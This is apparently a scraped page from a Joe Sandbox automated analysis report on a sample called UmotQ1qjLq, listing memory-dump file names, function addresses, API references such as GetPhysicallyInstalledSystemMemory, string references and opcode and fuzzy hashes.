Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 7x~
API String ID: 237503144-3352779061
Opcode ID: 9a08e52d6e398e203ff89564f03f6dd8a50269200a3965036a1c6f2159323911
Instruction ID: 3089680ca1a7c70cee00c6bf08120cd5b64eb14a5df5fef0be440cf7960d424b
Opcode Fuzzy Hash: 9a08e52d6e398e203ff89564f03f6dd8a50269200a3965036a1c6f2159323911
Instruction Fuzzy Hash: 380244B1E14314CFDB24CFA4D8816AEBBB2FF85310F1941A8D545AF355EB398905CB90

Function 00B3BE8A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 00B3C358

Strings

BVAI, xrefs: 00B3C52A

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: BVAI
API String ID: 3960555810-2651495128
Opcode ID: 5209133d7d31e642b8dfa66e8fb56a431b497d72b79ee06471dbb7dccc2f3288
Instruction ID: 7aa269bfcad971dcf242a92d21af27f35e3eafd293bdb6b7f3a82cdd67377b07
Opcode Fuzzy Hash: 5209133d7d31e642b8dfa66e8fb56a431b497d72b79ee06471dbb7dccc2f3288
Instruction Fuzzy Hash: 2BC1067160C3908BC729CF2984513ABBFE1EFAA304F1849ADD4C9E7352DB758906CB56

Function 00B3C26C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 00B3C358

Strings

BVAI, xrefs: 00B3C52A

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: BVAI
API String ID: 3960555810-2651495128
Opcode ID: d6fc8cf06a28b902e7a90d3db0d4c60e132ae12e7d7ccbd4433e342413e8c5b1
Instruction ID: 44a3b55d84ece99b392f11d30c8c73ef16caa19d84851ff0214005de1e7c50cb
Opcode Fuzzy Hash: d6fc8cf06a28b902e7a90d3db0d4c60e132ae12e7d7ccbd4433e342413e8c5b1
Instruction Fuzzy Hash: F9A1077160C3908BC7258F2984513FBBFE1EFAA304F1849ADD4C9A7352DB358906CB56

Function 00B3C282 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 331COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 00B3C358

Strings

BVAI, xrefs: 00B3C52A

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: BVAI
API String ID: 3960555810-2651495128
Opcode ID: 935eb59f1a72c9906a9494c05d864976f5308e7f2150a3c9230210116467d09a
Instruction ID: 18d09601f3038d8ea859f04da4f442145db802e4f7a67f0e15010b4e40ce76b4
Opcode Fuzzy Hash: 935eb59f1a72c9906a9494c05d864976f5308e7f2150a3c9230210116467d09a
Instruction Fuzzy Hash: FBA1F67160C3908BC7258F2984513FBBFE1EFAA304F2849ADD4C9A7352DB758906CB56

Function 00B50480 Relevance: 2.8, Strings: 2, Instructions: 345COMMON

Download Yara Rule

Strings

, xrefs: 00B50534, 00B50570, 00B50608
=:;8, xrefs: 00B504F4

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: InitializeThunk
String ID: =:;8$
API String ID: 2994545307-3594289699
